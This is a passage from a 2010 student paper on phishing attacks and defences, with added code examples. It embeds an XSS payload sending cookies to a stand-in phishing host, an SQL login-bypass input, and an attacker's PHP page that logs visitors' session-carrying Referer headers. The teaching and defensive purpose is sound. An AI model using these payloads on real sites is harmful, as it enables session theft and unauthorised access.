
2010

PHISHING ATTACKS AND SOLUTIONS
Universitetet i Oslo

Shahab Bakhtiyari
Candidate nr. 16
Ummair Tahir
Candidate nr. 81
Table of Contents

1 Introduction
2 History and definition of phishing
  2.1 Definition
  2.2 Categorization
3 Types of phishing
  3.1 Email phishing
  3.2 Rock phishing attacks
  3.3 Key loggers phishing
    3.3.1 Increased use of keyloggers
    3.3.2 Construction of keylogger
    3.3.3 Keyloggers spread
  3.4 Man in the middle phishing attack
  3.5 Session hijacking
    3.5.1 Types of session hijacking
  3.6 Content injection phishing
  3.7 Search engine phishing
4 Counter Measures
  4.1 User Education
  4.2 Email authentication
  4.3 Consumer reporting
  4.4 Antiphishing solution deployment
  4.5 Countermeasures for keyloggers
  4.6 Defence mechanism against MITM
    4.6.1 PIK
  4.7 Robust webbrowsers / blacklist
5 Involving Characteristics in phishing attacks
  5.1 Personal terms
  5.2 Business terms
6 A piece of advice
  6.1 Avoidance
  6.2 Interventions
  6.3 Treatments
7 Conclusion
8 References
1. Introduction

Identity theft is a popular idea among people with criminal intentions: they trick others into giving up their money or other valuables. Take an example: we place great trust in the police, so a cheat disguised in a police uniform could easily scam us, and could mislead many victims without anyone becoming suspicious. In today's society a person's identity is at stake in the same way as his car or house, and the criminal of this century has people's identities high on the target list.
Phishing points in the same direction as the policeman example. The only difference is that this scam happens online, and the victim never even sees the phisher.

Nowadays the Internet plays a significant role in online commerce and business activities. However, weak security on the Internet, together with the huge economic benefit on offer, attracts criminals who want to earn quick money in this field. Security risks on the Internet have grown exponentially as online services have become more popular. These risks are harmful, and undesirable events may occur in any application that has security gaps. Personal and sensitive data may be hijacked over unprotected Internet connections.

In this paper we look a little closer at the phenomenon of phishing, which is the most common technique thieves use to obtain what they want: our secret information, such as confidential documents, passwords and PIN codes. In general, they can monitor all our activities on the Internet. We intend to examine some of the most common types of phishing and see whether there are ways for Internet users to stay secure.

According to statistics from APWG (Anti-Phishing Working Group), the fourth quarter of 2009 saw a rise in the number of hijacked brands to a record 356 in October, up nearly 4.4 percent from the previous record of 341 in August 2009. Phishers continue to expand their target base to attack new brands.

Rock Phish kits, key loggers, session hijacking, content injection phishing, the "universal" man-in-the-middle phishing kit and search engine phishing are some of the types of phishing attacks an Internet user can encounter. Solutions such as phishing blacklists, email authentication, two-way authentication and one-time passwords are reviewed in this article.

At the end of this paper we suggest some preventive and useful advice for Internet users to protect themselves against phishers; by taking those steps they can reduce the threat dramatically.

2. History and definition of phishing

In 1995, some hackers succeeded in exploiting AOL with a fake program that used algorithms to generate credit card numbers, which were then used to open AOL accounts. This is the first recorded phishing attempt.

2.1 Definition
“Phishing is a criminal mechanism employing both social engineering and technical subterfuge to steal consumers’ personal identity data and financial account credentials” [11]

“The word phishing originally comes from the analogy that early Internet criminals used email lures to “phish” for passwords and financial data from a sea of Internet users. The use of “ph” in the terminology is partly lost in the annals of time, but most likely linked to popular hacker naming conventions such as “phreaks” which trace back to early hackers who were involved in “phreaking” - the hacking of telephone systems.” [8]

2.2 Categorization
Phishing attacks are categorized by their sophistication and by the way they are mitigated; for example, some use only email whereas others use a combination of email and a website. The latter is more common today. Some phishing attacks are technically more sophisticated and exploit well-known vulnerabilities in popular web browsers such as Internet Explorer to install malicious software (malware) that collects sensitive information about the user.
Rock Phish kits, key loggers, session hijacking, content injection phishing, the "universal" man-in-the-middle phishing kit and search engine phishing are some types of phishing attacks. Some of the solutions are phishing blacklists, email authentication, two-way authentication, one-time passwords, etc.

A common factor among the majority of phishing sites is that they mislead users into believing that they are legitimate sites. Recognizing phishing sites is therefore basically an authentication problem between users and servers. Web applications normally authenticate users before granting access to a requested resource. User authentication ranges from simple to strong, depending on the security policies set up for the resources or services. For example, clear-text password authentication will suffice to enter a web forum, whereas online banking requires the use of certificates and a public key infrastructure policy.
TLS¹ is the de facto standard today for secure web and electronic-commerce transactions. Its native integration with web browsers and web servers has made it the most popular security protocol. Unfortunately, TLS alone cannot resist spoofing attacks: it relies on the web browser to check and validate the server's (end-entity) certificate. Consequently, browser vendors have introduced several mitigations to reduce the threat of phishing attacks. However, these solutions need modifications at the application layer and create scalability problems [1]. Some of these solutions are reviewed in this paper after we have presented some types of attacks.

3. Types of phishing

3.1 Email Phishing

A phishing scam on the Internet starts with an email message that looks like an official communication from a trusted source such as a bank, a credit card company or a reputable online store. In the email, recipients are directed to a fraudulent website where they are asked to provide personal information such as account numbers or passwords.
The message is sent out to a large number of people, who are told, for example, that there is a problem with their credit at the bank. According to the email, the problem is easily solved by following an enclosed link to a website, where the victim is asked to enter personal data such as name, date of birth and credit card details. These data are then used to draw money from the card.
It is all made more credible when the email looks as if it comes from a reputable bank and the website it leads to looks much like the bank's official website. A common trick is a script that first opens the bank's actual website and then a smaller window, loaded from the attacker's server, in which the address bar is hidden. To many users this looks as if they have arrived at the bank's own website, and it feels safe to enter the requested information. Even though most people are not fooled, the law of large numbers suggests that enough of them are for this kind of computer crime to have proved profitable.

3.2 Rock phishing attacks

At the beginning of the 21st century, a group of phishers arose who were suspected of operating from Eastern Europe. They were given the name "Rock Phish gang" because early versions of their attacks contained the word "Rock" in the URL. For example:

'http:/www.bankname.securesite.com/rock/234/signing.html'

They are still very active although they no longer use the same naming convention. They have targeted international and local banks throughout the USA, Europe and South America. Recently, they have broadened their scope to include online brokerages, information services, treasury management companies and even social networking sites.

¹ Transport Layer Security (TLS) and its predecessor, Secure Sockets Layer (SSL), are cryptographic protocols that provide security for communications over networks such as the Internet. TLS and SSL encrypt the segments of network connections at the transport layer, end to end.
² DNS: the distributed database, sometimes including all the supporting hardware or software infrastructure, that the Internet uses to translate hostnames into IP numbers and provide other domain-related information.
In June 2007 they adopted several techniques to make their attacks harder to recognize and mitigate. In an elaborate multi-tiered scheme they use the stolen credentials of victims to register multiple domain names at multiple registrars. These domain names are generally short and meaningless, like "342egt.info". The gang then hosts its own authoritative DNS² servers, using wildcard A records to provide name-to-IP resolution for each of the fraudulently registered domain names. The IP addresses point to multiple compromised PCs. These PCs are part of a botnet and act as proxies in front of a number of back-end servers that host the phishing pages.
The challenge with this kind of attack is that each layer of the phisher's infrastructure (DNS, proxy server, back-end server) contains redundancy and variation. The benefit for the attacker is that the attack continues unfettered when any single element of the system is shut down. A traditional phishing site can be defeated by removing the hosting website or domain, but Rock Phish attackers share hosts and domains, so that when one of them is removed the infrastructure automatically switches to another.

Rock attacks are much more difficult to trace all the way through to the back-end server. The phishers change hosts and domain names quickly and stay constantly on the move, a cycle that leaves the international security community struggling. They seem able to produce unlimited combinations of the multiple tiers in their attacks. Their matrix of hosts gives them a robust system with many levels of failover: if a domain name server is taken down, name-to-IP resolution moves to another server; if a proxy running on a compromised host is defeated, it turns over to another compromised host.

To overcome site-blacklisting mitigations, Rock phishers use a huge number of slightly name-varied URLs to draw victims to their spoofed web pages, for example:

http://welcome23.bank.com.cbibsweb168st.342egt.info/confirm/submit.do/
http://welcome24.bank.com.cbibsweb59121j.342egt.info/confirm/submit.do/
http://welcome22.bank.com.cbibsweb146121k.342egt.info/confirm/submit.do/
http://welcome24.bank.com.cbibsweb574721a.342egt.info/confirm/submit.do/

According to MarkMonitor, up to 5000 URLs targeted a single organization in the period of one month. The large number of attacks in such a short period indicates that approximately 50% of all active phishing in the period can be associated with the Rock Phish gang. As long as a single URL still resolves to a live IP address, the attack keeps gathering information. Many combinations of URLs, hosts, domains and DNS servers can exist [5].
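The URL list above shows why a blacklist keyed on full URLs never catches up with a Rock Phish campaign, while one keyed on the domain the attacker actually had to register does. The following Python is an added example (not code from the paper or from MarkMonitor) that groups the URL patterns quoted above by registrable domain and flags hostnames that carry a brand name in their inner labels. It assumes a one-level public suffix (".info", ".com"); for suffixes such as .co.uk a real deployment would consult the Mozilla Public Suffix List.

```python
"""Group look-alike phishing URLs by the domain the attacker controls.

In a Rock Phish hostname the trusted brand ("bank.com") sits in the left-hand
labels, while the registrable domain at the right-hand end is a throwaway such
as 342egt.info answered by a wildcard A record. Blocking that registrable
domain covers every variant at once.
"""
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample: the URL shapes quoted in the text, plus one genuine URL.
SAMPLE_URLS = [
    "http://welcome23.bank.com.cbibsweb168st.342egt.info/confirm/submit.do/",
    "http://welcome24.bank.com.cbibsweb59121j.342egt.info/confirm/submit.do/",
    "http://welcome22.bank.com.cbibsweb146121k.342egt.info/confirm/submit.do/",
    "http://welcome24.bank.com.cbibsweb574721a.342egt.info/confirm/submit.do/",
    "https://www.bank.com/confirm/submit.do",
]


def registrable_domain(host: str) -> str:
    """Last two labels of the hostname: the part the operator had to register.

    One-level public-suffix approximation (assumption). Correct for .info and
    .com; wrong for .co.uk-style suffixes, where the Public Suffix List is needed.
    """
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def embedded_brands(host: str, brands) -> list:
    """Brand domains that appear as *inner* labels of host, i.e. somewhere other
    than the registrable end. 'bank.com' inside 'x.bank.com.y.342egt.info'
    counts; 'www.bank.com' does not, because bank.com *is* its registrable domain.
    """
    reg = registrable_domain(host)
    padded = f".{host.lower()}."
    return [b for b in brands if b != reg and f".{b}." in padded]


def cluster_by_domain(urls) -> dict:
    """Map registrable domain -> URLs. Many Rock Phish URLs collapse into one
    key, which is exactly what a domain-level blacklist acts on."""
    clusters = defaultdict(list)
    for url in urls:
        host = urlsplit(url).hostname or ""
        clusters[registrable_domain(host)].append(url)
    return dict(clusters)


def suspicious_urls(urls, brands) -> list:
    """URLs whose hostname impersonates a brand without being that brand."""
    return [u for u in urls if embedded_brands(urlsplit(u).hostname or "", brands)]


if __name__ == "__main__":
    for domain, members in cluster_by_domain(SAMPLE_URLS).items():
        print(f"{domain}: {len(members)} URL(s)")
    for url in suspicious_urls(SAMPLE_URLS, {"bank.com"}):
        print("brand impersonation:", url)
```

Four distinct URLs fall into a single "342egt.info" cluster, and all four are flagged for carrying "bank.com" as inner labels, while the genuine https://www.bank.com/ URL is neither clustered with them nor flagged.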

Rock attacks have since evolved further: the email sent to victims typically contains random text followed by a GIF (Graphics Interchange Format) image that holds the real phishing message. Currently, most spam filters lack an efficient algorithm for analysing such images and are therefore ineffective against them, which makes Rock phishing through this approach quite efficient. Many analysts believe that between one third and one half of all phishing attacks belong to the Rock category.

3.3 Key loggers phishing

The term "key logger" describes what it does. At a very abstract level, keylogging is divided into two categories: keylogging devices and keylogging software. The first category is normally small devices that can be attached to the keyboard or placed inline on the cable to the computer. Keylogging software is programs designed to track and log keystrokes [3].

Keylogger software installs itself either into a web browser or as a device driver. It secretly monitors and logs all keystrokes input on a PC and forwards the data to a specific phishing server. Keyloggers use many different methods and may be implemented in many ways, for instance [2]:

- A browser helper object that detects changes to the URL and logs information when the web address matches a desired credential collection site.
- A device driver that monitors mouse and keyboard input in conjunction with monitoring the user's activities.
- A screen-logger that monitors both the user's input and the display, to thwart alternative on-screen input security measures.

Keylogging devices are much rarer than keylogging software, but it is important to keep their existence in mind when thinking about information security.
Although keyloggers can collect information for a wide variety of sites, they are usually packaged to monitor the user's location and only transmit credentials for particular sites. Usually hundreds of such sites are targeted, such as financial institutions, information portals and corporate VPNs (Virtual Private Networks).
Secondary damage can occur when credentials captured by a keylogger give access to further systems. In one real-world example, the inclusion of a credit reporting agency in a keylogger spread via pornography spam led to the compromise of over 50 accounts with access to the agency, which in turn were used to compromise over 310,000 sets of personal information from the credit reporting agency's database [2].

The majority of keyloggers are presented as legitimate software and hardware and are sold on the open market; there can be many factors motivating customers to buy a keylogger, such as:
- Parental control: parents can track their children's activities
- Jealous spouses
- Company security: tracking the use of computers in a company
- Other security reasons

Today, keyloggers are mainly used to steal user information related to online payment systems, and hackers and phishers continuously write new keyloggers and Trojans for this very purpose.

Unlike much other malicious software, keyloggers do not threaten or damage the computer itself, but they can pose serious threats to users: among other things, they can be used to read confidential information entered via the keyboard. As a result, cyber criminals can use them to obtain PIN codes and passwords for email, bank accounts, etc.
Once a phisher, for instance, has access to a user's confidential data, s/he can easily transfer money from the user's online gaming account.

Unfortunately, access to a user's confidential data can cause far more harm than the loss of a small amount of money. The data may include proprietary commercial information and classified government material, which could compromise the security of state-owned organizations.

In recent years we have seen a large increase in the number of different kinds of malicious programs with key-logging functionality. No Internet user is immune to cyber crime, no matter where in the world s/he is and no matter which organization s/he works for.
A real-world example:

One of the most publicized key-logging incidents in recent years was the theft of over $1 million from client accounts at the major Scandinavian bank Nordea. In August 2006, Nordea clients started to receive emails, allegedly from the bank, suggesting that they install an antispam product which was supposedly attached to the message. When a user opened the attachment and saved it to his computer, the machine would be infected with a well-known Trojan called Haxdoor. This would be activated when the victim logged in at Nordea's online banking site, and it would falsely show the victim an error message requesting him to re-enter his information. The Trojan resident on the computer would record the data entered by the bank's client, and this data would be sent to the phishers' server. According to Haxdoor's author, the Trojan has also been used in attacks against Australian banks and many others.

3.3.1 Increased use of keyloggers

The fact that cyber criminals choose to use keyloggers time and again is confirmed by IT security companies. One of VeriSign's recent reports illustrates that the company has lately seen a sharp increase in the number of malicious programs with keylogging functionality.

[Figure: growth in the number of malicious programs with keylogging functionality. Source: iDefense, a VeriSign Company]

Kaspersky Lab [4] continuously finds new types of malicious software with keylogging functionality. The first keylogging alert on Kaspersky Lab's dedicated malware information site, www.viruslist.com, was published on 15 June 2001. The warning was about a Trojan called TROJ_LATINUS.SVR, a Trojan with keylogging functionality. Since then there has been a gradual increase in new modifications and new keyloggers. Kaspersky's database presently records more than 300 families of keyloggers. This number does not include keyloggers that are part of more complex threats.
The majority of new malicious programs are hybrids that implement many different methods. As a result, any category of malicious program may include programs with keylogger (sub)functionality. The number of spy programs detected by Kaspersky Lab each month is increasing, and most of these programs use keylogging technology.

3.3.2 Construction of Keylogger

Most keyloggers share one main idea: to get in between any two links in the chain of events from the moment a key is pressed to the moment information about the keystroke is displayed on the monitor. This can be achieved using video surveillance, a hardware bug in the keyboard, the wiring or the computer itself, intercepting input/output, substituting the keyboard driver, inserting a filter driver in the keyboard stack, intercepting kernel functions by any means possible, intercepting DLL functions in user mode, and finally using standard documented methods to request information from the keyboard.

There are three common constructions for a keylogger [3]:

1. A system hook which intercepts the notification that a key has been pressed (often written in C)
2. A cyclical request for information from the keyboard (often written in Visual Basic)
3. A filter driver (written in C; requires specialized knowledge)

Figure 3: Different types of keyloggers

The chart above [3] shows a rough breakdown of the different types of keyloggers using the three methods described above.

3.3.3 How keyloggers spread

Keyloggers spread in the same way as most other malicious programs, with some additional routes, for instance when a keylogger is purchased and installed by a jealous spouse or by the security department of an organization.
Some of the most common ways keyloggers spread are the following [3]. A keylogger:
– can be installed when a user opens a file attached to an email;
– can be installed when a file is launched from an open-access directory on a P2P network;
– can be installed via a web page script that exploits a browser vulnerability;
– can be installed by another malicious program already present on the victim's machine.
3.4 Man-in-the-Middle Phishing attack

The Wall Street Journal, July 5, 2008:

"The plan had a chance of working because, for months, in an operation one army officer likened to a 'broken telephone,' military intelligence had been able to convince Ms. Betancourt's captor, Gerardo Aguilar, a guerrilla known as 'Cesar,' that he was communicating with his top bosses in the guerrillas' seven-man secretariat. Army intelligence convinced top guerrilla leaders that they were talking to Cesar. In reality, both were talking to army intelligence." [20]

This ploy worked because Cesar and his guerrilla bosses didn't know one another well. They didn't recognize one another's voices, and didn't have a friendship or shared history that could have tipped them off about the ruse. Man-in-the-middle is defeated by context, and the FARC guerrillas didn't have any.

And that's why man-in-the-middle, abbreviated MITM in the computer-security community, is such a problem online: Internet communication is often stripped of any context. There's no way to recognize someone's face. There's no way to recognize someone's voice. When you visit a website, you have no idea whether you're really visiting that website. We all like to pretend that we know who we're communicating with, and for the most part, of course, there is no attacker inserting himself into our communications, but in reality we don't know.

‘In this type of phishing, the attacker uses a so-called Universal Man-in-the-Middle phishing kit to insert himself between two communicating parties. Both believe they are talking to each other, and the attacker can delete or modify the communications at will.’
The MITM kit consists of a PHP file which is installed on a server. The server acts as a proxy between the victim of the phishing attack and the genuine website.

The attack is also referred to as a bucket-brigade attack, or sometimes a Janus attack [20]. This type of attack is today the most common method used for tricking users. The threat appeared around 2006 and was considered very sophisticated.
Man-in-the-middle attacks may be performed using many different types of phishing. Some forms of phishing, such as proxy attacks, are inherently man-in-the-middle attacks; a man-in-the-middle may also be combined with many other types of phishing, including DNS-based phishing and deception-based phishing. The MITM attack can be very harmful and sometimes catastrophic because data communicated between the hosts can easily be altered. Wireless and mobile access networks have become widespread in the last 5-10 years and have provided an open gateway for this form of phishing to emerge and grow.

As an example of an MITM attack, consider a TCP or SSH connection between a client and a server. Using various techniques, the attacker splits the original connection into two new connections: one between the client and the attacker, the other between the attacker and the server [22]. The attacker has to be able to intercept all messages passing between the two victims and to inject new ones. Figure x shows how the attacker, acting as a fake server, lures the server and the client into believing that they are communicating with each other. This is done by compromising the host key [1] between the client and the host. The client establishes a connection with the server; unknown to both the server and the client, the attacker waits to intercept the negotiation. When authentication is to take place, the attacker, as the middleman, receives the client's authentication request, because the client (Bob) takes him for the server (Alice) it wants to connect to. Eve, the MITM, then establishes a connection with Alice pretending to be Bob. In this way a "secure" connection is set up, and Eve, the man in the middle, can see all communication between the client (Bob) and the server (Alice).

In plain and simple language, consider a simple bank attack where the bank requires some form of authentication from the user, such as a password or PIN code. The phisher, sitting in the middle, acquires this password by forwarding the bank's password request to the user and the user's reply to the bank. In this way both victims are fooled by the phisher: they both think they are communicating with each other, while the attacker is free to send transactions directly to the bank.

[Figure: Example of MITM]
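The Bob/Alice/Eve exchange described above, written out as an added simulation (not code from the paper or from any MITM kit). Host keys are stand-in random bytes so the code runs offline, and fingerprints are SHA-256 digests as in OpenSSH; the class and function names are chosen here. The point it shows is the one the FARC story makes: Eve cannot forge Alice's host key, so she has to present her own, and the only thing that lets Bob notice is "context" he brought with him, here a fingerprint remembered from an earlier contact (the role of SSH's known_hosts). Without that, Eve reads the PIN and relays it, and both Bob and Alice see a successful login.

```python
"""Simulated man-in-the-middle on an SSH-style login.

Bob (client) logs in to Alice (server). Eve sits between them: to Bob she
looks like a server, to Alice she looks like a client.
"""
import hashlib
import os


def fingerprint(host_key: bytes) -> str:
    """Short, human-comparable identity for a host key."""
    return "SHA256:" + hashlib.sha256(host_key).hexdigest()[:32]


class Server:
    """Alice: the genuine server."""

    def __init__(self) -> None:
        self.host_key = os.urandom(32)   # stand-in for the real public key
        self.received = []               # credentials that actually reached Alice

    def handshake(self) -> bytes:
        return self.host_key

    def authenticate(self, password: str) -> str:
        self.received.append(password)
        return "OK"


class Eve:
    """The middle: relays Bob <-> Alice but presents her own host key to Bob."""

    def __init__(self, real_server: Server) -> None:
        self.real = real_server
        self.host_key = os.urandom(32)   # cannot forge Alice's key, so uses her own
        self.captured = []

    def handshake(self) -> bytes:
        return self.host_key             # Bob receives Eve's key, not Alice's

    def authenticate(self, password: str) -> str:
        self.captured.append(password)   # read (or alter) at will ...
        self.real.handshake()            # ... open her own session to Alice ...
        return self.real.authenticate(password)   # ... and relay, so Alice sees "Bob"


class HostKeyMismatch(Exception):
    """Presented host key differs from the remembered one."""


def client_login(endpoint, password: str, known_hosts=None, name="alice") -> str:
    """Bob's side. known_hosts maps server name -> expected fingerprint;
    None means 'accept whatever key is presented', i.e. no context at all."""
    presented = fingerprint(endpoint.handshake())
    if known_hosts is not None:
        expected = known_hosts.get(name)
        if expected is None:
            known_hosts[name] = presented        # first contact: trust on first use
        elif expected != presented:
            raise HostKeyMismatch(f"{name}: expected {expected}, got {presented}")
    return endpoint.authenticate(password)


def run(pinned: bool) -> dict:
    """Run the attack with or without a remembered fingerprint for Alice."""
    alice = Server()
    eve = Eve(alice)
    known = {"alice": fingerprint(alice.host_key)} if pinned else None
    try:
        client_login(eve, "s3cret-PIN", known)
        logged_in = True
    except HostKeyMismatch:
        logged_in = False
    return {"login": logged_in,
            "eve_saw": list(eve.captured),
            "alice_got": list(alice.received)}


if __name__ == "__main__":
    print("no pinning:", run(pinned=False))
    print("pinned    :", run(pinned=True))
```

With no remembered fingerprint the login "succeeds" and the PIN appears in both Eve's capture and Alice's log; with the fingerprint pinned, Bob aborts at the handshake and nothing is sent.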

3.5 Session Hijacking

Session hijacking is taking over a user's session. Essentially, when two computers establish a connection, an attacker assumes the position of one of the computers by means of its session ID [25]. Session hijacking can be performed locally on a user's computer or remotely as part of a man-in-the-middle attack.

This form of attack is performed at two levels. Session hijacking at the network level is performed against TCP and UDP, while hijacking at the application level involves taking over HTTP sessions. The two kinds of attack can occur simultaneously, depending on the system being attacked. Network-level attacks are the most appealing to the attacker, because the attack program does not have to be tailor-made for the web application: it simply attacks the data flow of the protocol, which is common to all web applications. The most common methods for session hijacking are listed below:

3.5.1 Types of session hijacking

Session fixation, where the attacker sets a user's session ID to one known to him, for example by sending the user an email with a link that contains a particular session ID. The attacker then only has to wait until the user logs in.
Cross-site scripting, where the attacker tricks the user's browser into running code which is treated as trustworthy because it appears to belong to the server, allowing the attacker to obtain a copy of the cookie or perform other operations.

Session side-jacking, where the attacker uses packet sniffing to read network traffic between two parties and steal the session cookie. Many websites use SSL encryption for the login page to prevent attackers from seeing the password, but do not use encryption for the rest of the site once the user is authenticated. This allows an attacker who can read the network traffic to intercept all data submitted to the server and all web pages viewed by the client. Since this data includes the session cookie, the attacker can impersonate the victim even though the password itself is not compromised.
As an example, we explain session hijacking at the application layer. At this level the attacker can hijack existing sessions as well as create new sessions from the stolen data.

One form of session hijacking is HTTP session hijacking, which consists of acquiring the session IDs of the sessions. A session ID is the only unique identifier of an HTTP session. A session ID can be found in three places:
• in the URL received by the browser for the HTTP GET request;
• in the cookies stored on the victim's computer;
• within form fields [27].

The second point in the list above is described below:

1. Users A and B are both logged on to 'somesite.com'.
2. User A has no administrative privileges, but user B does.
3. User A posts a link somewhere for user B to click.
4. When B clicks the link, information about B's visit is logged on a web page controlled by A, which can later be used for harmful purposes. [28]

The web page that logs the information about the session can look like this (log.php):

<?php
// Records who followed the planted link: remote address, browser, requested
// page and the Referer header. The Referer is where a session ID carried in
// the victim's URL ends up when the link is on the same site.
session_start();
if (empty($_SESSION["logged"])) {
    $agent = $_SERVER['HTTP_USER_AGENT'];
    $uri = $_SERVER['REQUEST_URI'];
    $ip = $_SERVER['REMOTE_ADDR'];
    $ref = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
    $visitTime = date("r"); // Example: Thu, 21 Apr 2010 16:01:07 +0200

    $logLine = "$visitTime - IP: $ip || User Agent: $agent || Page: $uri || Referrer: $ref\n";
    $fp = fopen("visitorLog.txt", "a");
    fputs($fp, $logLine);
    fclose($fp);
    $_SESSION["logged"] = "yes";   // log each visitor's session only once
}
?>

The log.php file that logs the information about the session.

[Figure: Example of session hijacking [29]: manipulating the session token to carry out the session hijacking attack.]
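Two of the methods listed in 3.5.1, session fixation and side-jacking, are defeated on the server side by how the session ID is issued and how the cookie is flagged. The following Python is an added example (not from the paper or from any framework); the in-memory store and the names SessionStore, set_cookie_header and fixation_attempt are chosen here. It shows the two rules that kill fixation, never adopting an ID the server did not issue and rotating the ID at login, and the cookie attributes that keep a sniffer on the unencrypted part of the site from ever seeing the cookie.

```python
"""Session issuance hardened against fixation and cookie side-jacking."""
import secrets
import time


class SessionStore:
    """Server-side session table: sid -> {"user": str | None, "created": float}."""

    def __init__(self) -> None:
        self._sessions = {}

    def create(self) -> str:
        sid = secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG: unguessable
        self._sessions[sid] = {"user": None, "created": time.time()}
        return sid

    def lookup(self, sid: str):
        return self._sessions.get(sid)

    def accept_from_client(self, presented_sid) -> str:
        """Honour only IDs this server issued. An ID planted through a link or
        a crafted URL is replaced, never adopted into the table."""
        if presented_sid in self._sessions:
            return presented_sid
        return self.create()

    def login(self, presented_sid: str, user: str) -> str:
        """Called after the password has been verified. Rotate: the pre-login
        ID (which an attacker may know) is destroyed and a fresh one is bound
        to the user, so nothing the attacker held becomes authenticated."""
        self._sessions.pop(presented_sid, None)
        new_sid = self.create()
        self._sessions[new_sid]["user"] = user
        return new_sid


def set_cookie_header(sid: str, name: str = "SESSIONID") -> str:
    """Secure: never sent over plain http, so the cookie does not cross the wire
    in the clear once the user leaves the https login page. HttpOnly: not
    readable by page scripts (limits XSS theft). SameSite=Strict: not attached
    to cross-site requests."""
    return f"Set-Cookie: {name}={sid}; Path=/; Secure; HttpOnly; SameSite=Strict"


def fixation_attempt(store: SessionStore):
    """Attacker obtains a valid ID, lures the victim into using it, the victim
    logs in. Returns (attacker_now_authenticated_as_victim, victim_post_login_id)."""
    attacker_sid = store.create()                        # attacker's own session
    victim_sid = store.accept_from_client(attacker_sid)  # victim follows the link
    post_login = store.login(victim_sid, "victim")       # password checked, ID rotated
    hijacked = store.lookup(attacker_sid)                # attacker replays his ID
    return (hijacked is not None and hijacked["user"] == "victim"), post_login


if __name__ == "__main__":
    store = SessionStore()
    success, sid = fixation_attempt(store)
    print("attacker authenticated as victim:", success)
    print(set_cookie_header(sid))
```

The rotation step is the one most often missing: many session libraries will happily keep the pre-login ID across authentication unless told to regenerate it.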

3.6 Content Injection phishing

Content injection phishing is a kind of phishing in which the attacker inserts malicious content into a
legitimate website. The content can redirect the user to other sites, install malware on the user's
machine, or insert a frame whose contents send the user's data to a phishing server [30].

Figure X [32]: an example of a link that redirects the user to another address.

There are many variations of content injection, but generally there are three main types:

1. The attacker scans for servers that can be penetrated through a security vulnerability. Once inside
the server, they replace the legitimate content with malicious content.
2. Cross-site scripting (XSS), which was also used in the session hijacking example above. It takes
advantage of a programming flaw in the site: externally supplied content, such as a script embedded in a
request parameter, is not sufficiently filtered by the software on the site's server and is sent back
to other users' browsers as if it were part of the legitimate page.
3. SQL (Structured Query Language) injection. As with cross-site scripting, the attacker exploits
insufficient filtering of input, but here the input ends up in a database query, so the attacker can
execute commands on the server and cause information leakage or modification.
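The two flaws in points 2 and 3, shown side by side as an added example written for this page (not code from the original paper): a login query built by string formatting next to its parameterised form, and a page that echoes a search term into HTML unescaped next to one that escapes it. The SQLite table, the users, the phisher.example host and the payloads are constructed for the demonstration.

```python
"""
SQL injection and reflected cross-site scripting, vulnerable and hardened,
using an in-memory SQLite database. Example code for this page, not from the
original paper; table, users and inputs are constructed.
"""
import html
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT, admin INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("alice", "correct horse", 1), ("bob", "hunter2", 0)])
    return conn


def login_vulnerable(conn, user, password):
    """Concatenates user input straight into the SQL text (the flaw)."""
    sql = (f"SELECT name FROM users WHERE name = '{user}' "
           f"AND password = '{password}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, user, password):
    """Placeholders keep the data out of the SQL grammar: a quote in the input
    is just a character inside a string, never syntax."""
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    row = conn.execute(sql, (user, password)).fetchone()
    return row[0] if row else None


def search_page_vulnerable(term):
    """Reflects the query parameter into the page verbatim (reflected XSS)."""
    return f"<p>Results for: {term}</p>"


def search_page_safe(term):
    """Escapes <, >, &, and quotes so injected markup is displayed, not run."""
    return f"<p>Results for: {html.escape(term, quote=True)}</p>"


def demo():
    conn = make_db()
    # Attacker knows no password: close the string literal and comment out the rest.
    payload_user = "alice' --"
    vuln = login_vulnerable(conn, payload_user, "anything")   # "alice": logged in as admin
    safe = login_safe(conn, payload_user, "anything")         # None: no such user
    # Content-injection style payload: script that ships the session cookie to the phisher.
    xss = "<script>new Image().src='http://phisher.example/log?c='+document.cookie</script>"
    reflected = search_page_vulnerable(xss)   # contains a live <script> tag
    escaped = search_page_safe(xss)           # contains &lt;script&gt; only
    return vuln, safe, "<script>" in reflected, "<script>" in escaped
```

The payload in demo() turns the vulnerable query into `... WHERE name = 'alice' --' AND password = 'anything'`, so the password check is commented away and the attacker is logged in as alice; the parameterised query searches for a user literally named `alice' --` and finds nothing.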

3.7 Search Engine Phishing

Another method phishers use to lure users is to build fake web pages offering products and services.
Search engines find and index these pages, so that when a user searches, the fake pages appear among the
results. The pages usually offer goods and services at a very attractive price. For example, a phisher
creates a page advertising a savings account with an interest rate slightly higher than any real bank's.
Victims who find the page through a search engine enter their existing bank account credentials for a
"balance transfer" to the "new account", and the phisher receives the sensitive information as part of
an order, sign-up or balance transfer [2].

4. Countermeasures
In the former sections we have presented the types of phishing attacks, which can indeed cause serious
damage. Companies are constantly trying to strengthen their online security, but there is no single
measure that overcomes phishing. Institutions and users generally must rely on a distributed, multi-
layered (multi-tiered) defense, since phishers themselves have turned to a distributed, multi-tiered
system of attacks. A variety of technical and social techniques must be employed. Some of them [5] are
briefly discussed below.

4.1 User Education

Users are an important factor in the fight against cyber crime such as phishing. If users could inspect
email headers, verify URLs and refrain from revealing confidential information to phishers, the problem
would to a great extent be solved. User education can be an inexpensive yet high-profile way to reduce
fraud while convincing customers that their trust matters to a business. Having said this, it cannot be
expected that every single user has the awareness and proficiency to understand terms such as "email
header" or "URL", so education can only ever be one layer of the defense.

4.2 Email Authentication

Email authentication is another important element in preventing phishing. Business owners should
implement an email authentication technology such as Sender ID or DomainKeys Identified Mail (DKIM) on
their email systems. SMTP (Simple Mail Transfer Protocol), the standard protocol for email traffic,
provides no sender authentication by itself, so it has been very easy for phishers to send spoofed
messages that appear to come from a legitimate domain. Sender ID lets a receiving server check whether
the sending host is authorised to send mail for the domain; DKIM lets it verify the domain of the signer
and the integrity of the message (whether it has been altered in transit). Consequently, it becomes much
harder for phishers to send spam masqueraded as a legitimate message from the protected domain. The two
techniques are complementary, and it is ideal for a business to implement both. Note that either check
only helps if the receiving side actually evaluates it, and neither stops a phisher who sends from a
look-alike domain under their own control.
